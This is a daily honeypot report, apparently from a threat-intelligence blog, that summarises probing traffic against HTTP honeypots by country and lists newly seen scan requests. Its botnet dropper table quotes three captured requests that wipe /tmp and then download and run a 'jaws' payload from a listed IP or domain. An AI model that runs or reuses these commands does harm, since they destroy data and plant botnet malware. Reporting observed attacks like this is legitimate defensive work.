Skip to main content
  1. Daily-Posts/

Report: 2025-08-04

·393 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-04
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 26 new requests that have never been observed before (these were added to the monitored request database.).

A total of 427 requests were recorded during the day, originating from 3 different countries, with a peak of 91 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
BRGermany
SGGermany

botnet_dropper_behaviour
#

remote_addrrequest
197.51.187.185GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.153.34.39/jaws;sh+/tmp/jaws HTTP/1.1
8.219.214.90GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
125.71.237.92GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
631GET /dev/actuator/ HTTP/1.1
641GET /management/;/env HTTP/1.1
661GET /management/mappings HTTP/1.1
671GET /management/ HTTP/1.1
681GET /api/actuator/;/env HTTP/1.1
701GET /api/actuator/ HTTP/1.1
711GET /actuator/;/env HTTP/1.1
731GET /actuator/mappings HTTP/1.1
751GET /reports.js HTTP/1.1
761GET /js/bundle.js HTTP/1.1
771GET /bundle.5.1.1.js HTTP/1.1
781GET /js/messages_manager.js HTTP/1.1
791GET /scripts/services.js HTTP/1.1
801GET /js/configuration.js HTTP/1.1
811GET /js/lib/config.js HTTP/1.1
821GET /js/base.js HTTP/1.1
861GET /message-api/actuator/ HTTP/1.1
941GET /mappings.json HTTP/1.1
1231GET /resource/image/adminapi/default/web_favicon.ico HTTP/1.1
1261GET /app/actuator/ HTTP/1.1
1601GET /Odin/http/call1754287869 HTTP/1.1
1611GET /OdinHttpCall1754287869 HTTP/1.1
1621GET /odinhttpcall1754287869 HTTP/1.1
1631GET /OdinHttpCall1754293074 HTTP/1.1
1641GET /Odin/http/call1754293074 HTTP/1.1
1741GET /odinhttpcall1754293074 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
091US
173DE
256NL
351GB
445SG
518SC
612PL
711LT
811BG
910CA
109ZA
115BE
125IN
134RO
144HU
153BR
163KR
172IR
182RU
192GH
201FI
211EG
221FR
231EE
241SI
251CN
261GR
271TW
281LB
291HK

Related

Report: 2025-08-03
·355 words
Repport Daily
Report: 2025-08-02
·340 words
Repport Daily
Report: 2025-08-01
·311 words
Repport Daily